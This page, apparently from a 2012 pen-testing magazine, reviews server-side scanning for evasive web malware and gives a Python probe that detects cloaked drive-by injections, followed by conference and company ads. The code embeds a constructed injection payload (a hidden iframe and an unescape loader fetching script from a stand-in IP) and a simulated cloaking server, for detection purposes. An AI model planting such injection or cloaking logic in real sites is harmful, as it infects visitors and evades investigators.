Anyone familiar with web malware will know that the bad guys don't always make it easy for us and will employ techniques to prevent discovery. These include serving malware only once to any given IP address, blacklisting IP addresses used by malware analysts and even displaying false takedown notices to confound investigators. What you see is not always what you get in the world of drive-by hacking. One really cool feature from Sucuri is Server Side Scanning, offering a chance to catch the more evasive malware that remote web scanning might miss. It will also report on other findings, such as the versions of a number of popular web applications and plugins you have installed. Keeping track of the software you have installed is important, as bugs in packages such as WordPress are a common point of entry, which brings us to the subject of prevention.
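The evasions described above (one serve per source IP, blocklisted analyst addresses, content that differs by visitor) are exactly what a single fetch of a page cannot see, so a remote probe has to look at the page from several vantage points and compare. The script below is an added example written for this review; it is not Sucuri's code and does not describe how their scanner works. It extracts off-site script and iframe sources, hidden iframes and suspicious inline JavaScript from a page, then fetches the page under several client identities (a browser arriving from a search engine, a crawler, a bare command-line client), more than once each, and records which identity exposed each finding. The site hostname, client profiles, IP addresses, injected payload and the CloakingServer class are all constructed stand-ins so the script runs offline; a real probe would replace CloakingServer.fetch with an HTTP client routed through a distinct egress address per profile.

```python
"""Added example: multi-vantage remote page probe. Site, payload and server are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example-shop.test"  # the monitored site's own hostname (constructed)

# Inline-script constructs typical of injected drive-by loaders, rare in hand-written page code.
SUSPICIOUS_JS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "document.write": re.compile(r"document\.write\s*\("),
}

class RefCollector(HTMLParser):
    """Collects off-site script/iframe sources, hidden iframes and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.hidden_iframes, self.inline_scripts = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = {k: (v or "") for k, v in attrs}
        host = urlparse(a["src"]).hostname if a.get("src") else None
        if host and host != SITE_HOST:          # resource pulled from a foreign host
            self.external.append((tag, host))
        if tag == "iframe":                     # 0/1-pixel or CSS-hidden frames
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.hidden_iframes.append(host or "(relative)")
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline_scripts.append(data)

def analyse_page(html):
    """Return human-readable findings for one fetched page; [] means nothing suspicious."""
    p = RefCollector()
    p.feed(html)
    p.close()
    findings = [f"external {tag} from {host}" for tag, host in p.external]
    findings += [f"hidden iframe to {host}" for host in p.hidden_iframes]
    for body in p.inline_scripts:
        hits = [name for name, rx in SUSPICIOUS_JS.items() if rx.search(body)]
        if hits:
            findings.append("suspicious inline script: " + ", ".join(hits))
    return findings

# (name, User-Agent, source IP, Referer) identities the probe cycles through (constructed).
CLIENT_PROFILES = [
    ("firefox-via-google", "Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0",
     "203.0.113.10", "https://www.google.com/search?q=example+shop"),
    ("googlebot", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
     "203.0.113.11", None),
    ("curl", "curl/7.26.0", "198.51.100.5", None),
]

def scan_site(fetch, profiles=CLIENT_PROFILES, repeats=2):
    """Fetch under every identity, several times each; map each finding to the (profile,
    attempt) pairs that exposed it. fetch(ua, ip, referer) returns the page HTML."""
    report = {}
    for name, ua, ip, referer in profiles:
        for attempt in range(repeats):
            for finding in analyse_page(fetch(ua, ip, referer)):
                report.setdefault(finding, []).append((name, attempt))
    return report

# ---- constructed compromised site standing in for the network ----
CLEAN_PAGE = ('<html><head><title>Example Shop</title>'
              '<script src="http://www.example-shop.test/js/cart.js"></script></head>'
              '<body><h1>Welcome</h1><p>Orders shipped daily.</p></body></html>')
INJECTION = ('<iframe src="http://198.51.100.77/counter.php" width="1" height="1" '
             'style="visibility:hidden"></iframe><script>document.write(unescape('
             "'%3Cscript src=%22http://198.51.100.77/l.js%22%3E%3C/script%3E'));</script>")

class CloakingServer:
    """Serves the injection once per source IP, only to browser-looking clients that
    arrived from a search engine, and never to IPs on its analyst blocklist (constructed)."""
    def __init__(self, analyst_ips=("198.51.100.5",)):
        self.analyst_ips, self.already_served = set(analyst_ips), set()

    def fetch(self, ua, ip, referer):
        browser = ua.startswith("Mozilla/") and "bot" not in ua.lower()
        from_search = bool(referer) and "google." in referer
        if browser and from_search and ip not in self.analyst_ips | self.already_served:
            self.already_served.add(ip)
            return CLEAN_PAGE.replace("</body>", INJECTION + "</body>")
        return CLEAN_PAGE

if __name__ == "__main__":
    print("single curl fetch:", scan_site(CloakingServer().fetch, [CLIENT_PROFILES[2]], 1) or "clean")
    for finding, seen_by in scan_site(CloakingServer().fetch).items():
        print(f"{finding:50s} seen by {seen_by}")
```

Run stand-alone, the single curl-style fetch reports the site as clean, while the multi-profile scan attributes all three findings to the first attempt of the browser-from-search identity only; the second attempt from the same address and every other identity see a clean page. That asymmetry is itself a signal worth alerting on, independent of any signature match.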




In the next issue of

Honeypots. Available to download on September 17th. More topics in PenTest Magazine: eBanking, eDiscovery, Sandbox, Biometrics, Phishing, Spoofing, SSH Tunnelling, Guide to BackTrack, IAST, Cloud Application Pentesting, PCI Security Standards ... and more

If you would like to contact the PenTest team, just send an email to malgorzata.skora@software.com.pl or ewa.dudzic@software.com.pl. We will reply a.s.a.p. PenTest Magazine reserves the right to change the content of the next Magazine Edition.



Practical solutions to headline threats. Three days of information security insight. Only RSA® Conference Europe 2012 delivers the steps and strategies needed to protect your organisation’s assets. From managing smartphones and tablets, to the workplace risks from social media tools, get the techniques you want and the answers you need. Hear from highly regarded keynotes including Wikipedia founder Jimmy Wales, internationally renowned security technologist Bruce Schneier, and investigative journalist, author and broadcaster Misha Glenny – one of the world’s leading experts on cybercrime and global mafia networks.

• Leave with actionable solutions • Build your skills • Network with like-minded professionals • Stay informed, stay ahead

Date: 9 - 11 October Venue: Hilton London Metropole Hotel, U.K.

Hear how the world’s security experts manage challenges like:

• Mobile security • Data breaches • Hacktivism

• Cybercrime • Malware threats • Cloud computing

Get the practical insight your organisation needs. Attend and play your part in Europe’s most informative information security event.

Find out more at

www.rsaconference.com/pen ©2012 EMC Corporation. All rights reserved. RSA, the RSA logo and RSA Conferences are either registered trademarks or trademarks of EMC Corporation in the United States and/or other countries. All other products and services mentioned are trademarks of their respective companies. RSA Security U.K. Limited. Incorporated on June 6, 1996. Company Number: 3208788. Registered Office: 1 Carnegie Road, Newbury, Berkshire, RG14 5DJ, England

THE GREAT CIPHER MIGHTIER THAN THE SWORD


Virscent Technologies Pvt. Ltd., a brainchild of a team of IIT Kharagpur graduates, has been incubated in E-Cell IIT Kharagpur. It is an IT Solutions & Training Company, offering Web, Security and Network Solutions, IT Consulting and Support Services to numerous clients across the globe. We provide the following services:

a. Penetration Testing
b. Multimedia Services
c. Web Development
d. Training: a. Corporate Training b. Classroom Training c. Training programs for Educational Institutions.

Our Partners: 1. E-Cell IIT Kharagpur 2. Education Project Council of India

Website: www.virscent.com
Blog: www.virscent.com/blog

